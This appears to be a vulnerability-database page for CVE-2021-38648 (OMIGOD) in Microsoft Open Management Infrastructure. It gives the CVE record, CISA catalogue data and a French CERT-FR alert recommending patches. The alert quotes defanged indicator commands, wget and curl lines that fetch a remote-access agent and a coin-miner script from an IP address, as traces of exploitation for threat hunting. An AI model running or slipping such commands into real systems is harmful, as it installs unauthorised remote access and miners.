cvelistv5 - cve-2021-38648

CVE-2021-38648 (GCVE-0-2021-38648)

Vulnerability from cvelistv5

Published

2021-09-15 11:24

Modified

2025-10-21 23:25

Severity ?

7.8 (High) - CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H/E:U/RL:O/RC:C

CWE

Elevation of Privilege

Summary

Open Management Infrastructure Elevation of Privilege Vulnerability

References

URL

Tags

	https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-38648	x_refsource_MISC
	http://packetstormsecurity.com/files/164925/Microsoft-OMI-Management-Interface-Authentication-Bypass.html	x_refsource_MISC

Impacted products

Vendor

Product

Version

Microsoft

Open Management Infrastructure

Version: 16.0 < OMI Version 1.6.8-1
cpe:2.3:a:microsoft:open_management_infrastructure:*:*:*:*:*:*:*:*

Microsoft	System Center Operations Manager (SCOM)	Version: 1.0.0 < OMI version: 1.6.8-1 cpe:2.3:a:microsoft:system_center_operations_manager:-:::::::*
Microsoft	Azure Automation State Configuration, DSC Extension	Version: 2.0.0 < DSC Agent versions: 2.71.1.25, 2.70.0.30, 3.0.0.3 cpe:2.3:a:microsoft:azure_automation_state_configuration:-:::::::*
Microsoft	Azure Automation Update Management	Version: 1.0.0 < OMS Agent for Linux GA v1.13.40-0 cpe:2.3:a:microsoft:azure_automation_update_management:-:::::::*
Microsoft	Log Analytics Agent	Version: 1.0.0 < OMS Agent for Linux GA v1.13.40-0 cpe:2.3:a:microsoft:log_analytics_agent:-:::::::*
Microsoft	Azure Diagnostics (LAD)	Version: 3.0.0 < LAD v4.0.13 and LAD v3.0.135 cpe:2.3:a:microsoft:azure_diagnostics::::::::
Microsoft	Container Monitoring Solution	Version: 1.0.0 < publication cpe:2.3:a:microsoft:container_monitoring_solution:-:::::::*
Microsoft	Azure Security Center	Version: 1.0.0 < OMS Agent for Linux GA v1.13.40-0 cpe:2.3:a:microsoft:azure_security_center::::::::
Microsoft	Azure Sentinel	Version: 1.0.0 < OMS Agent for Linux GA v1.13.40-0 cpe:2.3:a:microsoft:azure_sentinel::::::::
Microsoft	Azure Stack Hub	Version: 1.0.0 < Monitor, Update and Config Mgmnt 1.14.01 Version: 1.0.0 < 3.1.135 cpe:2.3:a:microsoft:azure_stack_hub::::::::

CISA Known Exploited Vulnerability

Data from the CISA Known Exploited Vulnerabilities Catalog

Date added: 2021-11-03

Due date: 2021-11-17

Required action: Apply updates per vendor instructions.

Used in ransomware: Unknown

Notes: https://nvd.nist.gov/vuln/detail/CVE-2021-38648

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-04T01:51:18.994Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-38648"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://packetstormsecurity.com/files/164925/Microsoft-OMI-Management-Interface-Authentication-Bypass.html"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2021-38648",
                "options": [
                  {
                    "Exploitation": "active"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "total"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2025-02-04T18:10:24.645431Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          },
          {
            "other": {
              "content": {
                "dateAdded": "2021-11-03",
                "reference": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2021-38648"
              },
              "type": "kev"
            }
          }
        ],
        "problemTypes": [
          {
            "descriptions": [
              {
                "description": "CWE-noinfo Not enough information",
                "lang": "en",
                "type": "CWE"
              }
            ]
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2025-10-21T23:25:32.986Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "references": [
          {
            "tags": [
              "government-resource"
            ],
            "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2021-38648"
          }
        ],
        "timeline": [
          {
            "lang": "en",
            "time": "2021-11-03T00:00:00.000Z",
            "value": "CVE-2021-38648 added to CISA KEV"
          }
        ],
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "cpes": [
            "cpe:2.3:a:microsoft:open_management_infrastructure:*:*:*:*:*:*:*:*"
          ],
          "platforms": [
            "Unknown"
          ],
          "product": "Open Management Infrastructure",
          "vendor": "Microsoft",
          "versions": [
            {
              "lessThan": "OMI Version 1.6.8-1",
              "status": "affected",
              "version": "16.0",
              "versionType": "custom"
            }
          ]
        },
        {
          "cpes": [
            "cpe:2.3:a:microsoft:system_center_operations_manager:-:*:*:*:*:*:*:*"
          ],
          "platforms": [
            "Unknown"
          ],
          "product": "System Center Operations Manager (SCOM)",
          "vendor": "Microsoft",
          "versions": [
            {
              "lessThan": "OMI version: 1.6.8-1",
              "status": "affected",
              "version": "1.0.0",
              "versionType": "custom"
            }
          ]
        },
        {
          "cpes": [
            "cpe:2.3:a:microsoft:azure_automation_state_configuration:-:*:*:*:*:*:*:*"
          ],
          "platforms": [
            "Unknown"
          ],
          "product": "Azure Automation State Configuration, DSC Extension",
          "vendor": "Microsoft",
          "versions": [
            {
              "lessThan": "DSC Agent versions: 2.71.1.25, 2.70.0.30, 3.0.0.3",
              "status": "affected",
              "version": "2.0.0",
              "versionType": "custom"
            }
          ]
        },
        {
          "cpes": [
            "cpe:2.3:a:microsoft:azure_automation_update_management:-:*:*:*:*:*:*:*"
          ],
          "platforms": [
            "Unknown"
          ],
          "product": "Azure Automation Update Management",
          "vendor": "Microsoft",
          "versions": [
            {
              "lessThan": "OMS Agent for Linux GA v1.13.40-0",
              "status": "affected",
              "version": "1.0.0",
              "versionType": "custom"
            }
          ]
        },
        {
          "cpes": [
            "cpe:2.3:a:microsoft:log_analytics_agent:-:*:*:*:*:*:*:*"
          ],
          "platforms": [
            "Unknown"
          ],
          "product": "Log Analytics Agent",
          "vendor": "Microsoft",
          "versions": [
            {
              "lessThan": "OMS Agent for Linux GA v1.13.40-0",
              "status": "affected",
              "version": "1.0.0",
              "versionType": "custom"
            }
          ]
        },
        {
          "cpes": [
            "cpe:2.3:a:microsoft:azure_diagnostics:*:*:*:*:*:*:*:*"
          ],
          "platforms": [
            "Unknown"
          ],
          "product": "Azure Diagnostics (LAD)",
          "vendor": "Microsoft",
          "versions": [
            {
              "lessThan": "LAD v4.0.13 and LAD v3.0.135",
              "status": "affected",
              "version": "3.0.0",
              "versionType": "custom"
            }
          ]
        },
        {
          "cpes": [
            "cpe:2.3:a:microsoft:container_monitoring_solution:-:*:*:*:*:*:*:*"
          ],
          "platforms": [
            "Unknown"
          ],
          "product": "Container Monitoring Solution",
          "vendor": "Microsoft",
          "versions": [
            {
              "lessThan": "publication",
              "status": "affected",
              "version": "1.0.0",
              "versionType": "custom"
            }
          ]
        },
        {
          "cpes": [
            "cpe:2.3:a:microsoft:azure_security_center:*:*:*:*:*:*:*:*"
          ],
          "platforms": [
            "Unknown"
          ],
          "product": "Azure Security Center",
          "vendor": "Microsoft",
          "versions": [
            {
              "lessThan": "OMS Agent for Linux GA v1.13.40-0",
              "status": "affected",
              "version": "1.0.0",
              "versionType": "custom"
            }
          ]
        },
        {
          "cpes": [
            "cpe:2.3:a:microsoft:azure_sentinel:*:*:*:*:*:*:*:*"
          ],
          "platforms": [
            "Unknown"
          ],
          "product": "Azure Sentinel",
          "vendor": "Microsoft",
          "versions": [
            {
              "lessThan": "OMS Agent for Linux GA v1.13.40-0",
              "status": "affected",
              "version": "1.0.0",
              "versionType": "custom"
            }
          ]
        },
        {
          "cpes": [
            "cpe:2.3:a:microsoft:azure_stack_hub:*:*:*:*:*:*:*:*"
          ],
          "platforms": [
            "Unknown"
          ],
          "product": "Azure Stack Hub",
          "vendor": "Microsoft",
          "versions": [
            {
              "lessThan": "Monitor, Update and Config Mgmnt 1.14.01",
              "status": "affected",
              "version": "1.0.0",
              "versionType": "custom"
            },
            {
              "lessThan": "3.1.135",
              "status": "affected",
              "version": "1.0.0",
              "versionType": "custom"
            }
          ]
        }
      ],
      "datePublic": "2021-09-14T07:00:00.000Z",
      "descriptions": [
        {
          "lang": "en-US",
          "value": "Open Management Infrastructure Elevation of Privilege Vulnerability"
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "baseScore": 7.8,
            "baseSeverity": "HIGH",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H/E:U/RL:O/RC:C",
            "version": "3.1"
          },
          "format": "CVSS",
          "scenarios": [
            {
              "lang": "en-US",
              "value": "GENERAL"
            }
          ]
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "Elevation of Privilege",
              "lang": "en-US",
              "type": "Impact"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2023-12-28T19:37:20.542Z",
        "orgId": "f38d906d-7342-40ea-92c1-6c4a2c6478c8",
        "shortName": "microsoft"
      },
      "references": [
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-38648"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "http://packetstormsecurity.com/files/164925/Microsoft-OMI-Management-Interface-Authentication-Bypass.html"
        }
      ],
      "title": "Open Management Infrastructure Elevation of Privilege Vulnerability"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "f38d906d-7342-40ea-92c1-6c4a2c6478c8",
    "assignerShortName": "microsoft",
    "cveId": "CVE-2021-38648",
    "datePublished": "2021-09-15T11:24:08.000Z",
    "dateReserved": "2021-08-13T00:00:00.000Z",
    "dateUpdated": "2025-10-21T23:25:32.986Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1",
  "vulnerability-lookup:meta": {
    "cisa_known_exploited": {
      "cveID": "CVE-2021-38648",
      "cwes": "[\"CWE-1390\"]",
      "dateAdded": "2021-11-03",
      "dueDate": "2021-11-17",
      "knownRansomwareCampaignUse": "Unknown",
      "notes": "https://nvd.nist.gov/vuln/detail/CVE-2021-38648",
      "product": "Open Management Infrastructure (OMI)",
      "requiredAction": "Apply updates per vendor instructions.",
      "shortDescription": "Microsoft Open Management Infrastructure (OMI) within Azure VM Management Extensions contains an unspecified vulnerability allowing privilege escalation.",
      "vendorProject": "Microsoft",
      "vulnerabilityName": "Microsoft Open Management Infrastructure (OMI) Privilege Escalation Vulnerability"
    }
  }
}

CERTFR-2021-ALE-020

Vulnerability from certfr_alerte

[Version du 20 septembre 2021]

Le 18 septembre Microsoft a publié un article afin d'expliquer comment Azure Sentinel peut aider à la recherche d'une compromission notamment l'exploitation des vulnérabilités OMIGOD [4]. De plus, à cette occasion, les marqueurs suivants, qui correspondent à des traces liées à une tentative d'exploitation, ont été proposés par Microsoft :

wget https://www[.]dwservice[.]net/download/dwagent_generic[.]sh -O dwagent_generic.sh
echo curl https://www[.]dwservice[.]net/download/dwagent_generic[.]sh --output dw.sh > go.sh
curl -fSsL http://104[.]168[.]213[.]31:55879/coinlinux/runMiner[.]sh

[Version initiale]

Le 14 septembre 2021, une équipe de chercheurs en vulnérabilités a découvert quatre vulnérabilités dans Microsoft Azure, la plateforme cloud de Microsoft [1]. Ces vulnérabilités sont situées au sein du service OMI, lequel est déployé dans l'écosystème Azure. Ces vulnérabilités ont été regroupées sous l’appellation de « OMIGOD ». Le service OMI est le pendant open-source pour la famille de systèmes d'exploitation de type Linux ou Unix de WMI (Windows Management Infrastructure) et permet la gestion des configurations dans des environnements distants et locaux.

En particulier, la vulnérabilité immatriculée CVE-2021-38647 permet à un attaquant non authentifié de réaliser une exécution de code arbitraire avec les privilèges de l'utilisateur root. Elle impacte uniquement les entités utilisant les solutions de gestion Linux (On-Premises SCOM, Azure Automation State Configuration ou Azure Desired State Configuration extension) lorsque la gestion à distance est activée.

Pour des besoins de gestion à distance, il est possible que les ports associés à OMI (5986 / 5985 / 1270) soient accessibles depuis Internet. Dans ce cas, la vulnérabilité peut être exploitée afin d'obtenir un accès initial à un environnement Azure pour ensuite pouvoir se déplacer latéralement au sein du système d'information, en tirant notamment parti des trois autres vulnérabilités, qui permettent une élévation de privilèges locale.

Dans le cadre de son Patch Tuesday, en date du 14 septembre 2021 [5], Microsoft a ainsi mis à disposition un correctif pour ces quatre vulnérabilités :

CVE-2021-38647 : Avec un score CVSSv3 à 9.8 et permettant à un attaquant de pouvoir exécuter du code arbitraire à distance ;
CVE-2021-38648 : Avec un score CVSSv3 à 7.8 et permettant à un attaquant de pouvoir réaliser une élévation de privilèges ;
CVE-2021-38645 : Avec un score CVSSv3 à 7.8 et permettant à un attaquant de pouvoir réaliser une élévation de privilèges ;
CVE-2021-38649 : Avec un score CVSSv3 à 7.0 et permettant à un attaquant de pouvoir réaliser une élévation de privilèges

Des codes d'exploitation sont publiquement disponibles sur Internet pour la CVE-2021-38647, ce qui signifie que l’exploitation de cette vulnérabilité est imminente ou déjà en cours.

Solution

Le CERT-FR recommande fortement la mise à jour des extensions vulnérables. Pour cela, dans le cadre d'un déploiement dans le Cloud, veuillez vous assurer que la mise à jour a bien été appliquée, sinon dans le cas contraire l'effectuer manuellement. En ce qui concerne les déploiements OnPremises, les mises à jour des extensions vulnérables doivent être réalisées manuellement. Afin d'identifier les extensions concernées par ces vulnérabilités, les utilisateurs peuvent utiliser Azure Portal ou Azure CLI comme décrit dans la documentation de Microsoft [3].

Le CERT-FR rappelle également que ce type de service ne doit pas être exposé sur Internet. De plus, il est fortement recommandé de filtrer l’accès des ports susmentionnés associés au service OMI uniquement aux machines d'administration autorisées.

Impacted products

Vendor	Product	Description
Microsoft	Azure	System Center Operations Manager (SCOM) On-Premises OMI versions antérieures à v1.6.8-1 (OMI framework est utilisé pour la surveillance de Linux / Unix)
Microsoft	Azure	Azure Automation State Configuration, DSC Extension (Cloud) DSC Agent versions 2.71.X.XX antérieures à 2.71.1.25
Microsoft	Azure	Azure Automation State Configuration, DSC Extension (Cloud) DSC Agent versions 2.0.0.0
Microsoft	Azure	Azure Automation (On-Premises et Cloud) OMS Agent pour Linux GA versions v1.13.35 et antérieures
Microsoft	Azure	Azure Security Center (Cloud) OMS Agent pour Linux GA versions v1.13.35 et antérieures
Microsoft	Azure	Azure Automation State Configuration, DSC Extension (On-Premises) OMI versions antérieures à v1.6.8-1 (OMI framework est un pré-requis pour installer pour l'agent DSC )
Microsoft	Azure	Azure Automation State Configuration, DSC Extension (Cloud) DSC Agent versions 3.0.0.1 antérieures à 3.0.0.3
Microsoft	Azure	Log Analytics Agent (On-Premises et Cloud) OMS Agent pour Linux GA versions 1.13.35 et antérieures
Microsoft	Azure	le paquet OMI (On-Premises et Cloud) versions antérieures à v1.6.8-1
Microsoft	Azure	Azure Automation State Configuration, DSC Extension (Cloud) DSC Agent versions 2.70.X.XX antérieures à 2.70.0.30
Microsoft	Azure	Azure Diagnostics (LAD) (Cloud) versions 4.0.0 à 4.0.5 antérieures à 4.0.11
Microsoft	Azure	Container Monitoring Solution (Cloud) déployé avec une image docker ayant un SHA ID différent de 12b7682d8f9a2f67752bf121029e315abcae89bc0c34a0e05f07baec72280707
Microsoft	Azure	Azure Diagnostics (LAD) (Cloud) versions 3.0.131 et antérieures
Microsoft	Azure	Azure Automation Update Management (On-Premises et Cloud) OMS Agent pour Linux GA versions v1.13.35 et antérieures

References

Title

Publication Time

Tags

Bulletin de sécurité Microsoft CVE-2021-38648	2021-09-16	vendor-advisory
Bulletin de sécurité Microsoft CVE-2021-38649	2021-09-16	vendor-advisory
Bulletin de sécurité Microsoft CVE-2021-38645	2021-09-16	vendor-advisory
Bulletin de sécurité Microsoft CVE-2021-38647	2021-09-16	vendor-advisory
[4] Aide pour l'utilisation de Azure Sentinel	-	other
[1] Publication de l'équipe de chercheurs en vulnérabilités de Wiz	-	other
[5] Avis CERT-FR du 15 septembre 2021	-	other
[3] Documentation de Microsoft	-	other
[2] Recommandations supplémentaires pour les vulnérabilités OMIGOD	-	other

Show details on source website

JSON

To clipboard

{
  "$ref": "https://www.cert.ssi.gouv.fr/openapi.json",
  "affected_systems": [
    {
      "description": "System Center Operations Manager (SCOM) On-Premises OMI versions ant\u00e9rieures \u00e0 v1.6.8-1 (OMI framework est utilis\u00e9 pour la surveillance de Linux / Unix)",
      "product": {
        "name": "Azure",
        "vendor": {
          "name": "Microsoft",
          "scada": false
        }
      }
    },
    {
      "description": "Azure Automation State Configuration, DSC Extension (Cloud) DSC Agent versions 2.71.X.XX ant\u00e9rieures \u00e0 2.71.1.25",
      "product": {
        "name": "Azure",
        "vendor": {
          "name": "Microsoft",
          "scada": false
        }
      }
    },
    {
      "description": "Azure Automation State Configuration, DSC Extension (Cloud) DSC Agent versions 2.0.0.0",
      "product": {
        "name": "Azure",
        "vendor": {
          "name": "Microsoft",
          "scada": false
        }
      }
    },
    {
      "description": "Azure Automation (On-Premises et Cloud) OMS Agent pour Linux GA versions v1.13.35 et ant\u00e9rieures",
      "product": {
        "name": "Azure",
        "vendor": {
          "name": "Microsoft",
          "scada": false
        }
      }
    },
    {
      "description": "Azure Security Center (Cloud) OMS Agent pour Linux GA versions v1.13.35 et ant\u00e9rieures",
      "product": {
        "name": "Azure",
        "vendor": {
          "name": "Microsoft",
          "scada": false
        }
      }
    },
    {
      "description": "Azure Automation State Configuration, DSC Extension (On-Premises) OMI versions ant\u00e9rieures \u00e0 v1.6.8-1 (OMI framework est un pr\u00e9-requis pour installer pour l\u0027agent DSC )",
      "product": {
        "name": "Azure",
        "vendor": {
          "name": "Microsoft",
          "scada": false
        }
      }
    },
    {
      "description": "Azure Automation State Configuration, DSC Extension (Cloud) DSC Agent versions 3.0.0.1 ant\u00e9rieures \u00e0 3.0.0.3",
      "product": {
        "name": "Azure",
        "vendor": {
          "name": "Microsoft",
          "scada": false
        }
      }
    },
    {
      "description": "Log Analytics Agent (On-Premises et Cloud) OMS Agent pour Linux GA versions 1.13.35 et ant\u00e9rieures",
      "product": {
        "name": "Azure",
        "vendor": {
          "name": "Microsoft",
          "scada": false
        }
      }
    },
    {
      "description": "le paquet OMI (On-Premises et Cloud) versions ant\u00e9rieures \u00e0 v1.6.8-1",
      "product": {
        "name": "Azure",
        "vendor": {
          "name": "Microsoft",
          "scada": false
        }
      }
    },
    {
      "description": "Azure Automation State Configuration, DSC Extension (Cloud) DSC Agent versions 2.70.X.XX ant\u00e9rieures \u00e0 2.70.0.30",
      "product": {
        "name": "Azure",
        "vendor": {
          "name": "Microsoft",
          "scada": false
        }
      }
    },
    {
      "description": "Azure Diagnostics (LAD) (Cloud) versions 4.0.0 \u00e0 4.0.5 ant\u00e9rieures \u00e0 4.0.11",
      "product": {
        "name": "Azure",
        "vendor": {
          "name": "Microsoft",
          "scada": false
        }
      }
    },
    {
      "description": "Container Monitoring Solution (Cloud) d\u00e9ploy\u00e9 avec une image docker ayant un SHA ID diff\u00e9rent de 12b7682d8f9a2f67752bf121029e315abcae89bc0c34a0e05f07baec72280707",
      "product": {
        "name": "Azure",
        "vendor": {
          "name": "Microsoft",
          "scada": false
        }
      }
    },
    {
      "description": "Azure Diagnostics (LAD) (Cloud) versions 3.0.131 et ant\u00e9rieures",
      "product": {
        "name": "Azure",
        "vendor": {
          "name": "Microsoft",
          "scada": false
        }
      }
    },
    {
      "description": "Azure Automation Update Management (On-Premises et Cloud) OMS Agent pour Linux GA versions v1.13.35 et ant\u00e9rieures",
      "product": {
        "name": "Azure",
        "vendor": {
          "name": "Microsoft",
          "scada": false
        }
      }
    }
  ],
  "affected_systems_content": "",
  "closed_at": "2022-01-05",
  "content": "## Solution\n\nLe CERT-FR recommande fortement la mise \u00e0 jour des extensions\nvuln\u00e9rables. Pour cela, dans le cadre d\u0027un d\u00e9ploiement dans le *Cloud*,\nveuillez vous assurer que la mise \u00e0 jour a bien \u00e9t\u00e9 appliqu\u00e9e, sinon\ndans le cas contraire l\u0027effectuer manuellement. En ce qui concerne les\nd\u00e9ploiements *OnPremises,* les mises \u00e0 jour des extensions vuln\u00e9rables\n\u003cu\u003edoivent \u00eatre r\u00e9alis\u00e9es manuellement\u003c/u\u003e. Afin d\u0027identifier les\nextensions concern\u00e9es par ces vuln\u00e9rabilit\u00e9s, les utilisateurs peuvent\nutiliser Azure Portal ou Azure CLI comme d\u00e9crit dans la documentation de\nMicrosoft \\[3\\].\n\n**Le CERT-FR rappelle \u00e9galement que ce type de service ne doit pas \u00eatre\nexpos\u00e9 sur Internet. De plus, il est fortement recommand\u00e9 de filtrer\nl\u2019acc\u00e8s des ports susmentionn\u00e9s associ\u00e9s au service OMI uniquement aux\nmachines d\u0027administration autoris\u00e9es.** \n",
  "cves": [
    {
      "name": "CVE-2021-38648",
      "url": "https://www.cve.org/CVERecord?id=CVE-2021-38648"
    },
    {
      "name": "CVE-2021-38647",
      "url": "https://www.cve.org/CVERecord?id=CVE-2021-38647"
    },
    {
      "name": "CVE-2021-38645",
      "url": "https://www.cve.org/CVERecord?id=CVE-2021-38645"
    },
    {
      "name": "CVE-2021-38649",
      "url": "https://www.cve.org/CVERecord?id=CVE-2021-38649"
    }
  ],
  "initial_release_date": "2021-09-17T00:00:00",
  "last_revision_date": "2022-01-05T00:00:00",
  "links": [
    {
      "title": "[4] Aide pour l\u0027utilisation de Azure Sentinel",
      "url": "https://techcommunity.microsoft.com/t5/azure-sentinel/hunting-for-omi-vulnerability-exploitation-with-azure-sentinel/ba-p/2764093"
    },
    {
      "title": "[1] Publication de l\u0027\u00e9quipe de chercheurs en vuln\u00e9rabilit\u00e9s de Wiz",
      "url": "https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure"
    },
    {
      "title": "[5] Avis CERT-FR du 15 septembre 2021",
      "url": "https://www.cert.ssi.gouv.fr/avis/CERTFR-2021-AVI-711/"
    },
    {
      "title": "[3] Documentation de Microsoft",
      "url": "https://docs.microsoft.com/en-us/azure/virtual-machines/extensions/features-linux#discover-vm-extensions"
    },
    {
      "title": "[2] Recommandations suppl\u00e9mentaires pour les vuln\u00e9rabilit\u00e9s OMIGOD",
      "url": "https://msrc-blog.microsoft.com/2021/09/16/additional-guidance-regarding-omi-vulnerabilities-within-azure-vm-management-extensions/"
    }
  ],
  "reference": "CERTFR-2021-ALE-020",
  "revisions": [
    {
      "description": "Version initiale",
      "revision_date": "2021-09-17T00:00:00.000000"
    },
    {
      "description": "Ajout de la r\u00e9f\u00e9rence \u00e0 l\u0027avis CERT-FR",
      "revision_date": "2021-09-22T00:00:00.000000"
    },
    {
      "description": "Cl\u00f4ture de l\u0027alerte. Cela ne signifie pas la fin d\u0027une menace. Seule l\u0027application de la mise \u00e0 jour permet de vous pr\u00e9munir contre l\u0027exploitation de la vuln\u00e9rabilit\u00e9 correspondante.",
      "revision_date": "2022-01-05T00:00:00.000000"
    }
  ],
  "risks": [
    {
      "description": "\u00c9l\u00e9vation de privil\u00e8ges"
    },
    {
      "description": "Ex\u00e9cution de code arbitraire \u00e0 distance"
    }
  ],
  "summary": "\u003cstrong\u003e\\[Version du 20 septembre 2021\\]\u003c/strong\u003e\n\n\u003cspan class=\"mx_MTextBody mx_EventTile_content\"\u003e\u003cspan\nclass=\"mx_EventTile_body\" dir=\"auto\"\u003eLe 18 septembre Microsoft a publi\u00e9\nun article afin d\u0027expliquer comment Azure Sentinel peut aider \u00e0 la\nrecherche d\u0027une compromission notamment l\u0027exploitation des\nvuln\u00e9rabilit\u00e9s OMIGOD \\[4\\]. De plus, \u00e0 cette occasion, les marqueurs\nsuivants, qui correspondent \u00e0 des traces li\u00e9es \u00e0 une tentative\nd\u0027exploitation, ont \u00e9t\u00e9 propos\u00e9s par Microsoft : \u003c/span\u003e\u003c/span\u003e\n\n-   \u003cspan class=\"mx_MTextBody mx_EventTile_content\"\u003e\u003cspan\n    class=\"mx_EventTile_body\" dir=\"auto\"\u003ewget\n    https://www\\[.\\]dwservice\\[.\\]net/download/dwagent_generic\\[.\\]sh\u00a0\n    -O dwagent_generic.sh\u003c/span\u003e\u003c/span\u003e\n-   \u003cspan class=\"mx_MTextBody mx_EventTile_content\"\u003e\u003cspan\n    class=\"mx_EventTile_body\" dir=\"auto\"\u003eecho curl\n    https://www\\[.\\]dwservice\\[.\\]net/download/dwagent_generic\\[.\\]sh\u00a0\n    --output dw.sh \\\u003e go.sh\u003c/span\u003e\u003c/span\u003e\n-   \u003cspan class=\"mx_MTextBody mx_EventTile_content\"\u003e\u003cspan\n    class=\"mx_EventTile_body\" dir=\"auto\"\u003ecurl -fSsL\n    http://104\\[.\\]168\\[.\\]213\\[.\\]31:55879/coinlinux/runMiner\\[.\\]sh\u003c/span\u003e\u003c/span\u003e\n\n\u003cstrong\u003e\\[Version initiale\\]\u003c/strong\u003e\n\nLe 14 septembre 2021, une \u00e9quipe de chercheurs en vuln\u00e9rabilit\u00e9s a\nd\u00e9couvert quatre vuln\u00e9rabilit\u00e9s dans Microsoft Azure, la plateforme\ncloud de Microsoft \\[1\\]. Ces vuln\u00e9rabilit\u00e9s sont situ\u00e9es au sein du\nservice OMI, lequel est d\u00e9ploy\u00e9 dans l\u0027\u00e9cosyst\u00e8me Azure. Ces\nvuln\u00e9rabilit\u00e9s ont \u00e9t\u00e9 regroup\u00e9es sous l\u2019appellation de \u00ab *OMIGOD* \u00bb. Le\nservice OMI est le pendant open-source pour la famille de syst\u00e8mes\nd\u0027exploitation de type Linux ou Unix de WMI (Windows Management\nInfrastructure) et permet la gestion des configurations dans des\nenvironnements distants et locaux.\n\n\u00a0\n\nEn particulier, la vuln\u00e9rabilit\u00e9 immatricul\u00e9e CVE-2021-38647 permet \u00e0 un\nattaquant non authentifi\u00e9 de r\u00e9aliser une ex\u00e9cution de code arbitraire\navec les privil\u00e8ges de l\u0027utilisateur *root*. Elle impacte uniquement les\nentit\u00e9s utilisant les solutions de gestion Linux (*On-Premises* SCOM,\nAzure Automation State Configuration ou Azure Desired State\nConfiguration extension) lorsque la gestion \u00e0 distance est activ\u00e9e.\n\n\u00a0\n\nPour des besoins de gestion \u00e0 distance, il est possible que les ports\nassoci\u00e9s \u00e0 OMI (5986 / 5985 / 1270) soient accessibles depuis Internet.\nDans ce cas, la vuln\u00e9rabilit\u00e9 peut \u00eatre exploit\u00e9e afin d\u0027obtenir un\nacc\u00e8s initial \u00e0 un environnement Azure pour ensuite pouvoir se d\u00e9placer\nlat\u00e9ralement au sein du syst\u00e8me d\u0027information, en tirant notamment parti\ndes trois autres vuln\u00e9rabilit\u00e9s, qui permettent une \u00e9l\u00e9vation de\nprivil\u00e8ges locale.\n\n\u00a0\n\nDans le cadre de son Patch Tuesday, en date du 14 septembre 2021 \\[5\\],\nMicrosoft a ainsi mis \u00e0 disposition un correctif pour ces quatre\nvuln\u00e9rabilit\u00e9s :\n\n-   CVE-2021-38647 : Avec un score CVSSv3 \u00e0 9.8 et permettant \u00e0 un\n    attaquant de pouvoir ex\u00e9cuter du code arbitraire \u00e0 distance ;\n-   CVE-2021-38648 : Avec un score CVSSv3 \u00e0 7.8 et permettant \u00e0 un\n    attaquant de pouvoir r\u00e9aliser une \u00e9l\u00e9vation de privil\u00e8ges ;\n-   CVE-2021-38645 :\u00a0Avec un score CVSSv3 \u00e0 7.8 et permettant \u00e0 un\n    attaquant de pouvoir r\u00e9aliser une \u00e9l\u00e9vation de privil\u00e8ges ;\n-   CVE-2021-38649 :\u00a0Avec un score CVSSv3 \u00e0 7.0 et permettant \u00e0 un\n    attaquant de pouvoir r\u00e9aliser une \u00e9l\u00e9vation de privil\u00e8ges\n\n\u003cdiv markdown=\"1\"\u003e\n\n\u00a0\n\n\u003cdiv markdown=\"1\"\u003e\n\n\u003cstrong\u003eDes codes d\u0027exploitation sont publiquement disponibles sur Internet\npour la CVE-2021-38647\u003c/strong\u003e, ce qui signifie que l\u2019exploitation de cette\nvuln\u00e9rabilit\u00e9 est imminente ou d\u00e9j\u00e0 en cours.\n\n\u003c/div\u003e\n\n\u003cdiv markdown=\"1\"\u003e\n\n\u003c/div\u003e\n\n\u003c/div\u003e\n",
  "title": "[Maj] Multiples vuln\u00e9rabilit\u00e9s dans Microsoft Azure Open Management Infrastructure",
  "vendor_advisories": [
    {
      "published_at": "2021-09-16",
      "title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2021-38648",
      "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38648"
    },
    {
      "published_at": "2021-09-16",
      "title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2021-38649",
      "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38649"
    },
    {
      "published_at": "2021-09-16",
      "title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2021-38645",
      "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38645"
    },
    {
      "published_at": "2021-09-16",
      "title": "Bulletin de s\u00e9curit\u00e9 Microsoft CVE-2021-38647",
      "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38647"
    }
  ]
}

CERTFR-2021-AVI-711

Vulnerability from certfr_avis

De multiples vulnérabilités ont été corrigées dans les produits Microsoft. Elles permettent à un attaquant de provoquer une exécution de code à distance, une atteinte à la confidentialité des données, une élévation de privilèges et une usurpation d'identité.

Solution

Se référer au bulletin de sécurité de l'éditeur pour l'obtention des correctifs (cf. section Documentation).

None

Impacted products

Vendor	Product	Description
